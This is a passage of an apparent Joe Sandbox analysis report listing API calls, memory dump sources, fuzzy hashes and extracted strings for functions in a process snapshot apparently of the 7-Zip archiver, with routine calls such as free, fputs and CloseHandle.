                                                                                                                                                                                                                                            • Part of subcall function 0033419C: free.MSVCRT ref: 003341D1
                                                                                                                                                                                                                                            • Part of subcall function 0033419C: free.MSVCRT ref: 003341DD
                                                                                                                                                                                                                                            • Part of subcall function 0033419C: free.MSVCRT ref: 003341E6
                                                                                                                                                                                                                                            • Part of subcall function 0033419C: free.MSVCRT ref: 003341EF
                                                                                                                                                                                                                                            • Part of subcall function 0033419C: free.MSVCRT ref: 003341F8
                                                                                                                                                                                                                                          • free.MSVCRT ref: 00343F45
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                                          • Opcode ID: 9f8a1d2c49b0bee4d130ff5c6d2e38f6001c7bac36fe86653caaa0f784b82661
                                                                                                                                                                                                                                          • Instruction ID: 56b40977abc8f821c86ba0b0e58b201d9a7df1ea66639a0f49b4cc84747f146d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f8a1d2c49b0bee4d130ff5c6d2e38f6001c7bac36fe86653caaa0f784b82661
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48014073A24790CAC7229F1DC18115DBB64F759FE83695116DB490B760E732C887C791
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                                          • Opcode ID: 0cb8849b5f1b8dcf8495defb4a02ef2f2e9066f911d13bd2e7f25b7badd2a547
                                                                                                                                                                                                                                          • Instruction ID: e39a5b7f16830d94748ab1ac541c01ad995986d9501a934ac31fdd229b3fbc5d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0cb8849b5f1b8dcf8495defb4a02ef2f2e9066f911d13bd2e7f25b7badd2a547
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7016D763162408AE711CF14C56C39E3BB0B7D9B68F180208DBA44F3D1C7BAC58ACBA4
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1452528299-0
                                                                                                                                                                                                                                          • Opcode ID: 72e9e68ca430013701742a141a95d2249b3bc08b53a58632590991780ceaea4c
                                                                                                                                                                                                                                          • Instruction ID: fba063632e13c504e9ded0b1660ea6a9a8c62fd5011541e9529bf01ff5c08589
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 72e9e68ca430013701742a141a95d2249b3bc08b53a58632590991780ceaea4c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2DF0235236454847CB06DF7999C13A86161FB4C795F907435DF46C7701D938CCD9C715
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 003189D8: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,?,?,?,00000003,?,00000000,00000000), ref: 003189EA
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0031CB49
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 918212764-0
                                                                                                                                                                                                                                          • Opcode ID: a07007c1e2871dab96c79eb06679e0159d305b21fb5ff06fcf71a401af31ebbf
                                                                                                                                                                                                                                          • Instruction ID: 92135ba62472863a763479ace55f93ace3dbfc4b5d2d4ec31fa500813eb624ef
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a07007c1e2871dab96c79eb06679e0159d305b21fb5ff06fcf71a401af31ebbf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C6D02B407B409086DF165BB94CC13B40081A71C702F906435DD5BCA213E8188DC9A22A
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memmove
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2162964266-0
                                                                                                                                                                                                                                          • Opcode ID: ead37c245d68de3b924b300fd151c9469a6fa14fdf63e67ea49c121c3f4112c9
                                                                                                                                                                                                                                          • Instruction ID: 00923aa94b7407427c229d5f71d96acebaaa016f7a4e7538b2cd9fc9f749f39b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ead37c245d68de3b924b300fd151c9469a6fa14fdf63e67ea49c121c3f4112c9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60D05EA67406C886CA159B27D69151DA3219B8CFD5708D0249F080F70ACE20C8E68740
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,?,?,?,00000003,?,00000000,00000000), ref: 003189EA
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                                                                                                          • Opcode ID: 7026176aaa05c1561b6c1c0339a02e34eafe156cfb338b490f72a4c876cde8b9
                                                                                                                                                                                                                                          • Instruction ID: b2b9d05f2ec1a06d272dfd7c0fce8c9d8605671c9d9cb05eb85d8f88c02ebb75
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7026176aaa05c1561b6c1c0339a02e34eafe156cfb338b490f72a4c876cde8b9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3ED0A772601D4481DB2A1F7EC8403741354A718B74F184310CAB04A2D0DF248AC68305
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                                          • Opcode ID: 05270de921355061923bde3ca11a4f499c626c5521d971614da1d539e5086f1e
                                                                                                                                                                                                                                          • Instruction ID: b9e15248a2dc34e8dbddbdb71d2317bfc70468249453d337d7dc8667e0a4a65b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05270de921355061923bde3ca11a4f499c626c5521d971614da1d539e5086f1e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 76C08C417D22480AC90F622B2F863AC42020F8FBD2F4C60309E480FB92DA9488F28710
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free$memmove
                                                                                                                                                                                                                                          • String ID: Can not open mapping$Incorrect Map command$Map data error$MapViewOfFile error$Unsupported Map data$Unsupported Map data size
                                                                                                                                                                                                                                          • API String ID: 1534225298-798110030
                                                                                                                                                                                                                                          • Opcode ID: 514f4a55c9b7f830d527a1e71fc81ac4b18dd3f2c8c4aaf2250e63e43436fdca
                                                                                                                                                                                                                                          • Instruction ID: 72a475fce7c000beb191bf2de3a3d4f6335f212c604ef2a8e63af670cd6a69f8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 514f4a55c9b7f830d527a1e71fc81ac4b18dd3f2c8c4aaf2250e63e43436fdca
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 09C16F72218A409ACB1AEF11E88079FB765F7CAB91F541531EA8A47B78DF38C586C740
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FileTimeToLocalFileTime.KERNEL32 ref: 0031B12A
                                                                                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32 ref: 0031B13E
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Time$File$LocalSystem
                                                                                                                                                                                                                                          • String ID: gfff
                                                                                                                                                                                                                                          • API String ID: 1748579591-1553575800
                                                                                                                                                                                                                                          • Opcode ID: e09e1fa2f5dca829b3cb60a828e392fca3363189765d43a1e7a71e091b5d5d10
                                                                                                                                                                                                                                          • Instruction ID: 0c23cf5a598f636b7584c852a21d948fd8e3bfe122c7e8df08dbf98a112cdcf3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e09e1fa2f5dca829b3cb60a828e392fca3363189765d43a1e7a71e091b5d5d10
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EB519897B042C04BD71A8B3DD846BCDBFC1E3A9758F48822ADB9587785E26DC50AC721
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: \$\\?\$\\?\UNC\
                                                                                                                                                                                                                                          • API String ID: 0-1962706685
                                                                                                                                                                                                                                          • Opcode ID: afa8621be2f1ba154e1a16fbf024995038344baa93033ba3e81e106e98a5c824
                                                                                                                                                                                                                                          • Instruction ID: 2e7e017bc259c139a7ce3ab6b89e9a4e06638a5530a5c4163d24732960e918e5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: afa8621be2f1ba154e1a16fbf024995038344baa93033ba3e81e106e98a5c824
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7B1A22220A940A0CE1AFF21D4512EEA720EB9E7C5F455122EA4E4B779DF69C9C7C702
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                                          • Opcode ID: 604b93e9740048c82800e9d74cf7720333369c55d8207d772f7bb48edf82253e
                                                                                                                                                                                                                                          • Instruction ID: ea060c93fc851d045bca753d64f33984911a44e45198a66b0e8b34279351767d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 604b93e9740048c82800e9d74cf7720333369c55d8207d772f7bb48edf82253e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A031EC2261194099CB16FF36DC516EE7320EBCBF95F1902719F2D5F769CE20C8968354
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                                          • Opcode ID: f4d9c5df7f8b7d7a50d10b176def1ac906b2dbe33b2ad29e85ea175187436e74
                                                                                                                                                                                                                                          • Instruction ID: 905e11ebf695e1c8e2d4bc31c15e7c806944b66eb0bac5d607043cee5bd66842
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f4d9c5df7f8b7d7a50d10b176def1ac906b2dbe33b2ad29e85ea175187436e74
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A716132208A4091DB16EF26F8503AE7765FB89BD4F444232EF5E8B765DF28C596C340
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: fputs
                                                                                                                                                                                                                                          • String ID: = $ERROR$ERRORS:$WARNING$WARNINGS:
                                                                                                                                                                                                                                          • API String ID: 1795875747-2836439314
                                                                                                                                                                                                                                          • Opcode ID: bfaef9fa8df0d205eec04fe16e9a27ef95300a9a3da73fd13572728b12155a0b
                                                                                                                                                                                                                                          • Instruction ID: 7faf49293e460f0314a977b2ccd7afb950a21b9bf2e6ebc854c17bdd3cfce884
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bfaef9fa8df0d205eec04fe16e9a27ef95300a9a3da73fd13572728b12155a0b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 30117CA6210950A6FB279F26EA44B586724B709BC6F44C022DF4907A74DF39CBADC300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • fputs.MSVCRT ref: 003530E7
                                                                                                                                                                                                                                          • fputs.MSVCRT ref: 00353104
                                                                                                                                                                                                                                          • fputs.MSVCRT ref: 00353114
                                                                                                                                                                                                                                            • Part of subcall function 00312320: free.MSVCRT ref: 0031237E
                                                                                                                                                                                                                                            • Part of subcall function 00312320: fputs.MSVCRT ref: 003123B8
                                                                                                                                                                                                                                            • Part of subcall function 00312320: free.MSVCRT ref: 003123C4
                                                                                                                                                                                                                                          • fputs.MSVCRT ref: 00353132
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: fputs$free
                                                                                                                                                                                                                                          • String ID: : Can not open the file as [$ERROR$Open $WARNING$] archive
                                                                                                                                                                                                                                          • API String ID: 3873070119-2741933734
                                                                                                                                                                                                                                          • Opcode ID: f32defa99fa0ddd8f5ee8d7903e4695ca461ad93e2af0abed86e02622ffafdb7
                                                                                                                                                                                                                                          • Instruction ID: 36e40f7d76e8f8df918bf8086b23ccfda974b5d1dabaffaa5909164ac8b7cff1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f32defa99fa0ddd8f5ee8d7903e4695ca461ad93e2af0abed86e02622ffafdb7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 61F037AA700E05A5EE129F66E9943996339BB59FC5F849022EE6E033609E2DC649C300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                                          • Opcode ID: 69bfdf775510731243c3de3a419cefae75036ebb294f2fdce68b442dc703e0d6
                                                                                                                                                                                                                                          • Instruction ID: b5be162cfc454a03b8313a9c6beb4d3de7ab333f09da6caf284582d87d5a08b9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 69bfdf775510731243c3de3a419cefae75036ebb294f2fdce68b442dc703e0d6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8A011E63611980AECB1AEE36DC911E92720AB8AB98B194271BF1D4F755DE60C8E28344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CriticalSectionfputs$EnterLeavefree
                                                                                                                                                                                                                                          • String ID: :
                                                                                                                                                                                                                                          • API String ID: 1989314732-3653984579
                                                                                                                                                                                                                                          • Opcode ID: c7219ff94ad641548069c3c2d821b28e0e7cb5fb03aed72e0eb85cefbeb7bda8
                                                                                                                                                                                                                                          • Instruction ID: 78415c87dca715288de24aed58b682c9d7d486d5aa2aa106dd7be5f8fc9c6f83
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c7219ff94ad641548069c3c2d821b28e0e7cb5fb03aed72e0eb85cefbeb7bda8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A1312A76200A4481DB27DF25D8557EE2320F788FA9F595236DE5E4B7A8CF78C989C310
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
